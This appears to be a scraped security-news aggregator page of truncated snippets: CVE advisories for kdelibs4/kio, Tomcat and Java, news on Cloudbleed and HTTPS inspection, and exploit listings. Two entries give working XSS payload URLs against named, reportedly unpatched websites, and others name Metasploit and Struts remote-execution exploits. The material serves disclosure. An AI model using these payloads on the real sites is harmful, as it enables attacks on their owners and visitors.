Updated kdelibs4 packages fix security vulnerability

Using a malicious PAC file, and then using exfiltration methods in the PAC function FindProxyForURL enables the attacker to expose full https URLs. This is a security issue since https URLs may contain sensitive information in the URL authentication part user:password@host, and in the path and th...

OP5 5.3.5 / 5.4.0 / 5.4.2 / 5.5.0 / 5.5.1 - license.php Remote Command Execution Exploit

Exploit for multiple platform in category web applications This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' class MetasploitModule 'OP5 license.php Remote Command Execution', 'Description' = %q This...

shop.wilde-13.eu XSS vulnerability

Vulnerable URL: http://shop.wilde-13.eu/werbeartikel/suchen?keyword=%22%3Etrolo%3Ci%3Etralala%3Cimg+src%3Dx%20onerror=prompt/openbugbounty/%3E Details: Description| Value ---|--- Patched:| No Latest check for patch:| 28.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed...

Exploit for Improper Handling of Exceptional Conditions in Apache Struts

StrutsShell Apache Struts CVE-2017-5638 Shell Introducti...

SUSE-SU-2017:0716-1 Security update for java-1_7_0-ibm

This update for java-171-ibm fixes the following issues: Security issue fixed: - CVE-2016-2183: The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remo...

US-CERT Warns HTTPS Inspection May Degrade TLS Security

Recent academic work looking at the degradation of security occurring when HTTPS inspection tools are sitting in TLS traffic streams has been escalated by an alert published Thursday by the Department of Homeland Security. DHS’ US-CERT warned enterprises that running standalone inspection...

SSLsplit - transparent SSL/TLS interception

SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. It is intended to be useful for network forensics, application security analysis and penetration testing. SSLsplit is designed to transparently terminate connections that are redirected to it using a...

An SSL error has occurred and a secure connection to the server cannot be made.

“An SSL error has occurred and a secure connection to the server cannot be made.” This error was seen when browsing to HTTPS sites with Secure Web over a Full VPN tunnel. HTTP sites loaded correctly...

tomcat: Infinite loop in the processing of https requests

It was discovered that a programming error in the processing of HTTPS requests in the Apache Tomcat servlet and JSP engine may result in denial of service via an infinite loop...

openSUSE Security Update : kdelibs4 / kio (openSUSE-2017-334)

This update for kdelibs4, kio fixes the following issues : - CVE-2017-6410: Information Leak when accessing https when using a malicious PAC file boo1027520 %NASLMINLEVEL 70300 C Tenable Network Security, Inc. The descriptive text and package checks in this plugin were extracted from openSUSE...

FreeBSD : kio: Information Leak when accessing https when using a malicious PAC file (f714d8ab-028e-11e7-8042-50e549ebab6c)

Albert Astals Cid reports : Using a malicious PAC file, and then using exfiltration methods in the PAC function FindProxyForURL enables the attacker to expose full https URLs. This is a security issue since https URLs may contain sensitive information in the URL authentication part...

prestonpalace.nl XSS vulnerability

Vulnerable URL: https://www.prestonpalace.nl/search/All/%2522%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253Dprompt%2528%2527OPENBUGBOUNTY%2527%2529%253B%253E?zoekresultaat=%2522%253E%253Cimg%2Bsrc%253Dx%2Bonerror%253Dprompt%2528%2527OPENBUGBOUNTY%2527%2529%253B%253E Details: Description| Value ---|---...

HTTP/HTTPS Client Connection to Cloudflare Server

Binary data 9975.prm...

Cloudflare Server Detection via HTTP/HTTPS

Binary data 7256.pasl...

ipa security and bug fix update

4.4.0-14.0.1.el73.6 - Blank out header-logo.png product-name.png Replace login-screen-logo.png 20362818 4.4.0-14.6 - Resolves: 1416488 replication race condition prevents IPA to install - waitforentry: use only DN as parameter - Wait until HTTPS principal entry is replicated to replica - Use prop...

UBUNTU-CVE-2017-6410

kpac/script.cpp in KDE kio before 5.32 and kdelibs before 4.14.30 calls the PAC FindProxyForURL function with a full https URL potentially including Basic Authentication credentials, a query string, or PATHINFO, which allows remote attackers to obtain sensitive information via a crafted PAC file...

Cloudflare Client Detection via HTTP/HTTPS

Binary data 7252.pasl...

Cloudbleed Bug Leaks Sensitive Cloudflare Customer Data

The Cloudflare content delivery network for months has been leaking customer data, everything from private messages to encryption keys and credentials belonging to users of some of the Internet’s biggest properties. The vulnerability has been addressed, Cloudflare CTO John Graham-Cumming said, bu...

[SECURITY] [DLA 823-2] tomcat7 regression update

Package : tomcat7 Version : 7.0.28-4+deb7u11 CVE ID : CVE-2017-6056 Debian Bug : 854551 The update for tomcat7 issued as DLA-823-1 caused that the server could return HTTP 400 errors under certain circumstances. Updated packages are now available to correct this issue. For reference, the original...

[SECURITY] [DSA 3788-2] tomcat8 regression update

------------------------------------------------------------------------- Debian Security Advisory DSA-3788-2 [email protected] https://www.debian.org/security/ Salvatore Bonaccorso February 22, 2017 https://www.debian.org/security/faq -...